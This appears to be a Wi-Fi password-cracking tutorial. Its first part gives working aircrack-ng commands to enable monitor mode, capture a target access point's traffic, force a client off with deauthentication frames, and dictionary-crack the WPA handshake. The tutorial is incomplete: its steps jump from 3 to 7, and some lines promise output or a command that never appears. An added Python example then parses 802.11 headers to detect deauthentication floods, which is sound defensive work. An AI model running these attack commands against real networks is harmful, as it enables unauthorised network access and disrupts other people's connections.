Step 1: Enter monitor mode
airmon-ng # list the wireless interfaces currently in use
airmon-ng check # list processes that may interfere with wireless scanning
airmon-ng check kill # kill the processes that may interfere with wireless scanning
airmon-ng start wlan0 # put wlan0 into monitor mode
Use the iwconfig command to confirm that the Mode of the wlan0mon interface has switched to Monitor.
Step 2: Start capturing packets and save them to a file
airodump-ng wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w wpa # --bssid MAC of the AP to listen to, -c channel to listen on, -w prefix of the capture file
Step 3: Deauthentication to capture the handshake (a client device must already be connected to the wireless router)
Send deauthentication packets to disconnect a device (phone, laptop, etc.) currently associated with the AP (router), so that the device reconnects and the handshake can be captured.
aireplay-ng -0 1 -a EC:26:CA:DC:29:B6 -c 68:3E:34:30:0F:AA wlan0mon # -0 deauthentication mode, 1 = number of deauth bursts, -a MAC of the router, -c MAC of the wireless client to disconnect, sent through wlan0mon
When the handshake message appears, the handshake has been captured successfully:
Step 7: Dictionary attack on the password (Kali ships with word lists; they can also be downloaded from the Internet or generated from your own combinations)
aircrack-ng -w /usr/share/john/password.lst wpa-01.cap # -w dictionary to use
/usr/share/wordlist contains a fairly large dictionary (over ten million passwords), rockyou.txt.gz, which can be unpacked with
Finally, the password is obtained:
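Step 3 depends on deauthentication frames, so a defender monitoring the air wants to spot such bursts in a monitor-mode capture. The following is an added example, not code from the original page: a stdlib-only Python parser for raw 802.11 MAC headers that counts deauthentication frames (management type 0, subtype 12) per sender and BSSID and flags bursts above a threshold. It assumes the radiotap header has already been stripped from each frame; the sample frames are constructed here, reusing the MAC addresses from the tutorial, and the flood threshold of 5 is an assumption.

```python
import struct
from collections import Counter

MGMT_TYPE = 0        # 802.11 frame type: management
DEAUTH_SUBTYPE = 12  # management subtype: Deauthentication


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_frame(frame: bytes):
    """Parse the fixed 24-byte 802.11 MAC header (radiotap already removed).
    Returns a dict, or None if the frame is too short to be valid."""
    if len(frame) < 24:
        return None
    fc = frame[0]                  # first byte of Frame Control (little-endian)
    ftype = (fc >> 2) & 0x3        # bits 2-3: type
    subtype = (fc >> 4) & 0xF      # bits 4-7: subtype
    info = {"type": ftype, "subtype": subtype,
            "dst": mac_str(frame[4:10]), "src": mac_str(frame[10:16]),
            "bssid": mac_str(frame[16:22])}
    if ftype == MGMT_TYPE and subtype == DEAUTH_SUBTYPE and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]  # reason code
    return info


def count_deauths(frames):
    """Count deauthentication frames keyed by (sender MAC, BSSID)."""
    counts = Counter()
    for f in frames:
        p = parse_frame(f)
        if p and p["type"] == MGMT_TYPE and p["subtype"] == DEAUTH_SUBTYPE:
            counts[(p["src"], p["bssid"])] += 1
    return counts


def flag_floods(frames, threshold=5):
    """Return (sender, bssid) pairs with at least `threshold` deauth frames."""
    return {k: n for k, n in count_deauths(frames).items() if n >= threshold}


def build_frame(fc0, dst, src, bssid, body=b""):
    """Constructed test frame: FC, duration, addr1-3, seq ctrl, optional body."""
    return bytes([fc0, 0]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body


AP = bytes.fromhex("ec26cadc29b6")      # AP MAC used in the tutorial
CLIENT = bytes.fromhex("683e34300faa")  # client MAC used in the tutorial
# Constructed capture: one beacon, ten deauths (reason 7) spoofed from the AP, one data frame.
SAMPLE = ([build_frame(0x80, b"\xff" * 6, AP, AP)]
          + [build_frame(0xC0, CLIENT, AP, AP, struct.pack("<H", 7))] * 10
          + [build_frame(0x08, AP, CLIENT, AP)])
```

Running flag_floods(SAMPLE) reports the AP address with 10 deauthentication frames; on a real capture, feed it the 802.11 frames with radiotap headers removed.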